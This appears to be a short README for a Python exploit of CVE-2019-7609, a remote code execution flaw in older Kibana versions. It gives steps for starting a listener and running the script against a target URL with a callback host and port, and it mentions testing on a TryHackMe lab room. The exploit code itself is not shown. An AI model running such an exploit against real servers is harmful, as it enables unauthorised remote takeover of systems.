Exploit for CVE-2019-7609 written in python3.6+ based on the code by LandGrey.
CVE-2019-7609: RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer.
- Start a listener
- Run the exploit with the target url (base url of the kiba server), the listener host address and listener port as arguments
./cve-2019-7609.py http://<target>:5601 <listener-ip> <listener-port>- Enjoy RCE
Tested on the Kiba room on TryHackme
